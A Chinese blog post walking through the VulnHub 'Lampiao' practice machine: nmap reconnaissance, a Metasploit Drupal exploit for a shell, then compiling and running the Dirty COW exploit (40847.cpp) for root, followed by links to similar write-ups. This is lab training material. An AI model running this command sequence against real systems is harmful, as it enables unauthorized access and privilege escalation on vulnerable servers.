vulnhub-lampiao-linux-脏牛提权

已于 2023-05-31 13:15:09 修改
阅读量165 收藏
点赞数
文章标签: 前端 信息可视化 javascript web安全 安全
于 2023-05-31 11:41:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MIs_Jiangyaomin/article/details/130965762
版权
  1. 信息搜集

netdiscover -r 192.168.136.0/24

image.png

nmap -sS -sV -A 192.168.136.143

image.png

nmap -p 1-62235 192.168.136.143
image.png

http://192.168.136.143:1898/robots.txt

image.pngimage.png

查看changelog 日志文件,此文件包含linux漏洞修复信息
http://192.168.136.143:1898/CHANGELOG.txtimage.png

发现2017中的Drupal 漏洞没有修复,可以在kali上msf,进行利用msfconsole
search Drupal
use 1
set rhost 192.168.136.143
set rport 1898
run
image.png

getshell目标靶机现在利用kali自带的提权脚本dirty cow进行web提权
searchsploit dirty
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /home/kaliimage.pngimage.png

将kali上的脚本利用msf上传到目标机中
upload /home/kali/40847.cpp /tmp/40847.cppimage.png

上传之后就是利用g++运行此c++脚本
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil //g++编译文件
ls // 查看文件
./dcow //运行文件
image.pngimage.png

利用生成的密码返回虚拟机终端进行登陆,一开始想直接在webshell中 su root可是被deny了,就只能返回虚拟机登陆
user:root //账号
pw:dirtyCowFun //密码

whoami //查看当前用户

image.png

ali_china
关注
VulnHub--Lampiao-linux脏牛漏洞提权
记录笔记
07-06 1082
vulnhub-靶场--lampiao
Vulnhub-Lampiao 靶机渗透
Majula
01-30 2294
WalkthroughDownloadDescriptionPen TestingInformation GatheringExploitationReview Download Lampião: 1 ~ VulnHub VM 镜像文件,直接选择 打开虚拟机 即可。 Description Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lampião 1”. Get root!
VulnHub-Lampiao-Walkthrough渗透学习
qq_34801745的博客
12-27 2373
VulnHub-Lampiao-Walkthrough 靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/ 靶机难度:简单 靶机发布日期:2018年7月28日 靶机描述:Would you like to keep hacking in your own lab? Try this brand new vulnerable machine! “Lam...
vulnhub靶场之lampiao
向阳-Y.的博客
02-28 4375
目录1.信息收集2.尝试爆破ssh登录【失败】3.尝试访问网站3.1扫描目录【失败】4.网站系统漏洞【get】5.提权阶段 1.信息收集 首先查看本机网卡网段并来一波存活主机探查,经过排除,锁定了192.168.86.132为靶机 nmap -sP 192.168.86.0/24 接着再对靶机进行一波端口扫描,扫描后的结果如下 nmap -sN -sV -p 1-65535 192.168.86.132 2.尝试爆破ssh登录【失败】 首先使用msfconsole进行ssh登录爆破一波 msfcon
vulhub靶机--lampiao
m0_58595840的博客
02-02 514
vulnhub渗透,脏牛提权
脏牛漏洞】vulnhub-Lampiao
Mr_atopos的博客
06-07 443
利用CVE-2018-7600、脏牛
vulnhub-lampiao靶机练习
weixin_52451257的博客
11-10 1750
第一步:信息收集 Nmap –sS –p 1-65535 192.168.231.1-255 (靶机使用的是nat模式,和攻击机处于同一网段,所以扫描231.1-255整个网段的地址排除攻击机kali的ip就可以判断出靶机的ip) 我们可以可能到靶机开放了22(ssh),80(http),1898端口, 可以通过dirmap 扫描目录 Python3 dirmap.py –i http:192.168.231.139 –lcf 先访问80端口看一下网站长啥样,有没有可以利...
小白的靶机-VulnHub-Lampiao
wo41ge的博客
12-08 290
靶机地址,看这里 一、信息收集 我们在VM中需要确定攻击目标的IP地址,需要使用nmap获取目标IP地址: 关于nmap的入门操作 nmap -sP 192.168.86.0/24 或者使用netdiscover获取目标IP地址 我们就拿到了这次靶机的IP地址:192.168.86.160 开始探索机器。第一步是找出目标计算机上可用的开放端口和一些服务。因此我在目标计算机上启动了nmap全端口T5速度扫描: nmap -sS -sV -T5 -A -p- 192.168.86.160 目标计算机上
Vulnhub系列-Lampiao
Yasso的博客
01-06 3014
靶机:192.168.12.133 kali:192.168.12.128 一、信息搜集 nmap -p- -sV 192.168.12.133 访问80端口 一串乱码(没找到有用的信息) 访问1898端口 Drupal−CMS\color{red}{Drupal-CMS}Drupal−CMS http://192.168.12.133:1898/?q=node/2 audio.m4a qrc.png wget http://192.168.12.133:1898/audio.m4a wget http:
vulnhub打靶--lampiao
m0_52920608的博客
07-18 117
首先是信息搜集,查看到对应drupal版本信息其次利用drupal漏洞getshell最后利用脏牛漏洞提权
vulnhub lampiao靶机 Linux脏牛提权
weixin_51441054的博客
04-04 3309
首先我们打开靶机,发现需要登录 利用kali作为攻击机,先扫描其ip地址,kali ip为192.168.142.134,因为在同一局域网下,用nmap扫描 得到靶机ip为192.168.142.136,访问80端口 再进一步扫描端口 得到一个1898端口,貌似是主页 发现cms信息 利用msf进行漏洞利用 攻击成功,得到一个普通用户权限 上传一个探测Linux提权漏洞的探针 发现没有Perl,不能运行,换一个探针...
Vulnhublampiao渗透测试
Bird&Bird
04-02 1083
目录1、靶场概述2、信息收集1、靶场概述DescriptionBack to the TopWould you like to keep hacking in your own lab?Try this brand new vulnerable machine! "Lampião 1".Get root!Level: Easy链接:[靶场下载地址](https://www.vulnhub.com/entry/lampiao-1,249/)Kali IP 地址: 192.168.29.131靶场IP地址: 1
【甄选靶场】Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权
人间体佐菲的博客
08-30 1970
【甄选靶场】Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权
Linux脏牛提权漏洞 CVE-2016-5195 Vulnhub靶场
weixin_62591194的博客
07-08 597
【漏洞复现】Linux脏牛提权(CVE-2016-5195 vulnhub
渗透测试实战Vulnhub-Lampiao
weixin_44558065的博客
06-22 1685
目录 一、设计概述 1.1、渗透测试的意义 1.2、渗透测试的目的 二、需求分析 2.1、用户需求分析 2.2、渗透测试 三、方案规划与实施 3.1、信息收集 3.1.1 Nmap扫描 3.1.2 wpscan扫描 3.1.4 webdirscan目录扫描 3.2 漏洞分析 3.2.1 漏洞名称 3.2.2 漏洞概述 3.2.3 漏洞点 3.2.4 漏洞触发流程 3.2.5 漏洞利用 3.2.6 修复意见 3.3 web渗透 一、设计概述 1.1、渗透测试的意义 信息安全等级保护的要求 2015年12月2
lampiao打靶思路详解(vulnhub
MCcming的博客
03-12 458
确定靶机IP为192.168.31.116再次使用nmap对靶机IP进行详细扫描结果如下。
Kali Vulnhub-lampiao脏牛提权(dirtyCow)漏洞复现
牛奶栗的小博客
09-27 4515
vulnhubvulhub不同,无需安装环境。 lampiao下载地址:https://www.vulnhub.com/entry/lampiao-1,249。 下载完成正常解压后,vmware打开ovf格式文件,创建lampiao虚拟机文件即可,设置网络为NAT模式...
Linux脏牛(CVE-2016-5195)提权保姆级教程
weixin_68408599的博客
08-17 3894
对CVE-2016-5159提权的保姆级的教程
Lampiao(dirtycow)脏牛漏洞复现
weixin_34075268的博客
06-13 726
nmap扫描内网80端口发现目标主机 nmap -sP -p 80 192.168.31.0/24 扫描发现目标主机开放22端口、并且 1898端口开放http服务 御剑扫描目录并访问之后发现存在目录遍历漏洞 且部分文件可以下载 下载后浏览发现cms版本 寻找i相关漏洞...
vulnhub-morpheus怎么登录
最新发布
10-14
Vulnhub-Morpheus是一个Linux渗透环境,通常用于网络安全学习和实践。登录Morpheus需要几个步骤: 1. **获取IP地址**:首先你需要访问Vulnhub网站 (https://vulnhub.com/),搜索"Morpheus"找到该渗透实例的详情页,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值